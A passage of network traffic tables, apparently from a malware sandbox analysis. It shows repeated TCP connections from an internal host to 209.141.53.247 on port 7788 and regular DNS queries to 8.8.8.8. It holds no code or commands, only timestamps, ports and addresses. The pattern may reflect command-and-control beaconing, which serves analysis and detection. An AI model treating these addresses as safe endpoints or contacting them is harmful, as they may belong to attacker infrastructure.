Jul 2, 2024 18:15:04.531100035 CEST	7788	44666	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:04.537743092 CEST	44668	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:04.543761969 CEST	7788	44668	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:04.543822050 CEST	44668	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:04.546035051 CEST	44668	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:04.551305056 CEST	7788	44668	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:06.331209898 CEST	7788	44668	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:06.333396912 CEST	44668	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:06.336025953 CEST	7788	44668	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:06.336071968 CEST	44668	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:06.338476896 CEST	7788	44668	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:06.346440077 CEST	44670	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:06.351231098 CEST	7788	44670	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:06.351298094 CEST	44670	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:06.353499889 CEST	44670	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:06.358346939 CEST	7788	44670	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:07.973606110 CEST	7788	44670	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:07.974910021 CEST	44670	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:07.976380110 CEST	44670	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:07.981218100 CEST	7788	44670	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:07.987308025 CEST	44672	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:07.992335081 CEST	7788	44672	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:07.992407084 CEST	44672	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:07.994707108 CEST	44672	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:07.999831915 CEST	7788	44672	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:09.589921951 CEST	7788	44672	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:09.590850115 CEST	44672	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:09.591525078 CEST	44672	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:09.596383095 CEST	7788	44672	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:09.603358030 CEST	44674	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:09.608294010 CEST	7788	44674	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:09.608334064 CEST	44674	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:09.610521078 CEST	44674	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:09.615325928 CEST	7788	44674	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:11.197124958 CEST	7788	44674	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:11.198782921 CEST	44674	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:11.200097084 CEST	44674	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:11.205224037 CEST	7788	44674	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:11.213036060 CEST	44676	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:11.218008041 CEST	7788	44676	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:11.218106031 CEST	44676	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:11.223198891 CEST	44676	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:11.228056908 CEST	7788	44676	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:12.826417923 CEST	7788	44676	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:12.826811075 CEST	44676	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:12.828695059 CEST	44676	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:12.834582090 CEST	7788	44676	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:12.838922024 CEST	44678	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:12.843709946 CEST	7788	44678	209.141.53.247	192.168.2.14
Jul 2, 2024 18:15:12.843789101 CEST	44678	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:12.847867012 CEST	44678	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:15:12.852746010 CEST	7788	44678	209.141.53.247	192.168.2.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 18:13:13.965816975 CEST	54333	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:13.970102072 CEST	47143	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:13.972325087 CEST	53	54333	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:13.976963997 CEST	53	47143	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:15.599849939 CEST	52538	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:15.603288889 CEST	45432	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:15.606826067 CEST	53	52538	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:15.609694004 CEST	53	45432	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:17.234371901 CEST	52012	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:17.236331940 CEST	45532	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:17.240964890 CEST	53	52012	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:17.243083000 CEST	53	45532	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:18.839168072 CEST	51805	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:18.839356899 CEST	36900	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:18.846519947 CEST	53	51805	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:18.847155094 CEST	53	36900	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:20.561141968 CEST	49911	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:20.561332941 CEST	52681	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:20.766989946 CEST	53	49911	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:20.768111944 CEST	53	52681	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:22.389599085 CEST	57841	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:22.389784098 CEST	46174	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:22.396414995 CEST	53	57841	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:22.397608042 CEST	53	46174	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:24.183620930 CEST	44703	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:24.186573982 CEST	34703	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:24.191035986 CEST	53	44703	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:24.194113970 CEST	53	34703	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:25.790604115 CEST	42775	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:25.793494940 CEST	35988	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:25.797593117 CEST	53	42775	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:25.799612045 CEST	53	35988	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:27.399995089 CEST	58639	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:27.400171041 CEST	54118	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:27.407010078 CEST	53	54118	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:27.408556938 CEST	53	58639	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:29.031352997 CEST	51656	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:29.032651901 CEST	34879	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:29.039073944 CEST	53	51656	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:29.042182922 CEST	53	34879	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:30.636538029 CEST	37619	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:30.640352011 CEST	37483	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:30.644788027 CEST	53	37619	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:30.650202036 CEST	53	37483	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:32.284136057 CEST	57867	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:32.284405947 CEST	38078	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:32.291096926 CEST	53	38078	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:32.291110039 CEST	53	57867	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:33.886480093 CEST	55785	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:33.886775017 CEST	60062	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:33.892834902 CEST	53	55785	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:33.893867016 CEST	53	60062	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:35.498083115 CEST	42396	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:35.501064062 CEST	50201	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:35.505729914 CEST	53	42396	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:35.508090973 CEST	53	50201	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:37.126235962 CEST	34566	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:37.127691984 CEST	48570	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:37.132668018 CEST	53	34566	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:37.134458065 CEST	53	48570	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:38.730803967 CEST	46608	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:38.730997086 CEST	42349	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:38.737248898 CEST	53	46608	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:38.737591982 CEST	53	42349	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:40.587814093 CEST	33493	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:40.588150978 CEST	51751	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:40.612868071 CEST	53	51751	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:40.612888098 CEST	53	33493	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:42.215075970 CEST	60437	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:42.215372086 CEST	49554	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:42.221856117 CEST	53	49554	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:42.222152948 CEST	53	60437	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:43.828629971 CEST	58345	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:43.831918955 CEST	39717	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:43.836374044 CEST	53	58345	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:43.839958906 CEST	53	39717	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:45.472801924 CEST	57746	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:45.474287987 CEST	44188	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:45.479717970 CEST	53	57746	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:45.480475903 CEST	53	44188	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:47.253124952 CEST	49421	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:47.254839897 CEST	41989	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:47.260061026 CEST	53	49421	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:47.261749029 CEST	53	41989	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:48.874876976 CEST	56717	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:48.875174046 CEST	45907	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:48.881109953 CEST	53	56717	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:48.881614923 CEST	53	45907	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:50.498800039 CEST	55103	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:50.502166033 CEST	51551	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:50.505928993 CEST	53	55103	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:50.509826899 CEST	53	51551	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:52.119829893 CEST	45763	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:52.122286081 CEST	42021	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:52.127008915 CEST	53	45763	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:52.129133940 CEST	53	42021	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:53.729948044 CEST	40475	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:53.730173111 CEST	39973	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:53.736423016 CEST	53	40475	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:53.737016916 CEST	53	39973	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:55.477740049 CEST	35775	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:55.477972031 CEST	54340	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:55.484591007 CEST	53	35775	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:55.484910965 CEST	53	54340	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:57.110788107 CEST	54220	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:57.110987902 CEST	58068	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:57.117747068 CEST	53	58068	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:57.118150949 CEST	53	54220	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:58.734031916 CEST	37539	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:58.734297037 CEST	47079	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:13:58.740330935 CEST	53	37539	8.8.8.8	192.168.2.14
Jul 2, 2024 18:13:58.741000891 CEST	53	47079	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:00.357702017 CEST	40623	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:00.360876083 CEST	59885	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:00.364415884 CEST	53	40623	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:00.367264986 CEST	53	59885	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:01.974080086 CEST	50285	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:01.974289894 CEST	51611	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:01.980998039 CEST	53	51611	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:01.981010914 CEST	53	50285	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:03.608968973 CEST	54612	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:03.609153986 CEST	40865	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:03.615812063 CEST	53	54612	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:03.615884066 CEST	53	40865	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:05.230693102 CEST	59527	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:05.233939886 CEST	47598	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:05.239275932 CEST	53	59527	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:05.243038893 CEST	53	47598	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:06.858468056 CEST	41396	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:06.858683109 CEST	39321	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:06.865492105 CEST	53	39321	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:06.865554094 CEST	53	41396	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:08.489779949 CEST	40777	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:08.489984989 CEST	55554	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:08.496542931 CEST	53	40777	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:08.497504950 CEST	53	55554	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:10.104021072 CEST	46468	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:10.104254961 CEST	41557	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:10.110431910 CEST	53	46468	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:10.111176968 CEST	53	41557	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:11.733099937 CEST	47930	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:11.733323097 CEST	51535	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:11.739581108 CEST	53	47930	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:11.740333080 CEST	53	51535	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:13.340761900 CEST	55425	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:13.340980053 CEST	41085	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:13.347839117 CEST	53	55425	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:13.347879887 CEST	53	41085	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:14.950051069 CEST	53631	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:14.950278044 CEST	43835	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:14.956357956 CEST	53	53631	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:14.956865072 CEST	53	43835	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:16.590183973 CEST	59500	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:16.591769934 CEST	57163	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:16.597234964 CEST	53	59500	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:16.598126888 CEST	53	57163	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:18.216202974 CEST	54748	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:18.216485977 CEST	42407	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:18.222917080 CEST	53	54748	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:18.224234104 CEST	53	42407	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:19.847203016 CEST	52089	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:19.848803997 CEST	51570	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:19.853800058 CEST	53	52089	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:19.855422020 CEST	53	51570	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:21.463753939 CEST	56221	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:21.463831902 CEST	39834	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:21.470643044 CEST	53	56221	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:21.470735073 CEST	53	39834	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:23.243113995 CEST	35168	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:23.243412971 CEST	46201	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:23.249715090 CEST	53	46201	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:23.249955893 CEST	53	35168	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:24.859894037 CEST	57409	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:24.860177040 CEST	44377	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:24.866595030 CEST	53	57409	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:24.867027998 CEST	53	44377	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:26.478758097 CEST	55071	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:26.478929996 CEST	48531	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:26.486454964 CEST	53	55071	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:26.486515045 CEST	53	48531	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:28.096065044 CEST	58498	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:28.096239090 CEST	55016	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:28.102889061 CEST	53	58498	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:28.102900028 CEST	53	55016	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:29.717561960 CEST	33605	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:29.721471071 CEST	50819	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:29.728904009 CEST	53	33605	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:29.731127024 CEST	53	50819	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:31.363512993 CEST	48803	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:31.364516020 CEST	36145	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:31.370079994 CEST	53	48803	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:31.372519970 CEST	53	36145	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:32.979027033 CEST	50631	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:32.979378939 CEST	55428	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:32.987065077 CEST	53	55428	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:32.987096071 CEST	53	50631	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:35.368033886 CEST	47156	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:35.372464895 CEST	41057	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:35.376889944 CEST	53	47156	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:35.380183935 CEST	53	41057	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:36.981350899 CEST	58184	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:36.982984066 CEST	36133	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:36.987678051 CEST	53	58184	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:36.991436958 CEST	53	36133	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:38.591532946 CEST	58576	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:38.591691971 CEST	48270	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:38.598002911 CEST	53	58576	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:38.598056078 CEST	53	48270	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:40.221297026 CEST	50607	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:40.221543074 CEST	51777	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:40.228498936 CEST	53	51777	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:40.228584051 CEST	53	50607	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:41.823203087 CEST	58131	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:41.823328018 CEST	49069	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:41.829468966 CEST	53	49069	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:41.830179930 CEST	53	58131	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:43.438344002 CEST	41723	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:43.440253019 CEST	49122	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:43.445611000 CEST	53	41723	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:43.446855068 CEST	53	49122	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:45.067749977 CEST	49960	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:45.069586992 CEST	60921	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:45.074681997 CEST	53	49960	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:45.076220036 CEST	53	60921	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:46.684108019 CEST	58080	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:46.685575008 CEST	42467	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:46.691050053 CEST	53	58080	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:46.691786051 CEST	53	42467	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:48.291810989 CEST	48718	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:48.291954994 CEST	53384	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:48.298171043 CEST	53	48718	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:48.298605919 CEST	53	53384	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:49.921870947 CEST	46412	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:49.922724009 CEST	58121	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:49.928088903 CEST	53	46412	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:49.929575920 CEST	53	58121	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:51.532326937 CEST	40866	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:51.532469034 CEST	33886	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:51.541613102 CEST	53	40866	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:51.542553902 CEST	53	33886	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:53.172935009 CEST	44817	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:53.173187017 CEST	58978	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:53.179951906 CEST	53	44817	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:53.180032969 CEST	53	58978	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:54.794234037 CEST	57713	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:54.794329882 CEST	49131	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:54.804291010 CEST	53	57713	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:54.804303885 CEST	53	49131	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:56.436242104 CEST	46027	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:56.438051939 CEST	48616	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:56.443185091 CEST	53	46027	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:56.444809914 CEST	53	48616	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:58.044667959 CEST	58095	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:58.044775009 CEST	38683	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:58.052218914 CEST	53	38683	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:58.052819014 CEST	53	58095	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:59.668982029 CEST	35823	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:59.673352957 CEST	40138	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:14:59.675591946 CEST	53	35823	8.8.8.8	192.168.2.14
Jul 2, 2024 18:14:59.680305004 CEST	53	40138	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:01.315491915 CEST	35766	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:01.316277027 CEST	55918	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:01.322160006 CEST	53	35766	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:01.322594881 CEST	53	55918	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:02.917653084 CEST	43007	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:02.917815924 CEST	40897	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:02.924915075 CEST	53	43007	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:02.926660061 CEST	53	40897	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:04.526885986 CEST	57597	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:04.529916048 CEST	56740	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:04.533792019 CEST	53	57597	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:04.536385059 CEST	53	56740	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:06.334883928 CEST	40733	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:06.335557938 CEST	53997	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:06.343625069 CEST	53	40733	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:06.343741894 CEST	53	53997	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:07.978025913 CEST	40256	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:07.978202105 CEST	58067	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:07.984412909 CEST	53	58067	8.8.8.8	192.168.2.14
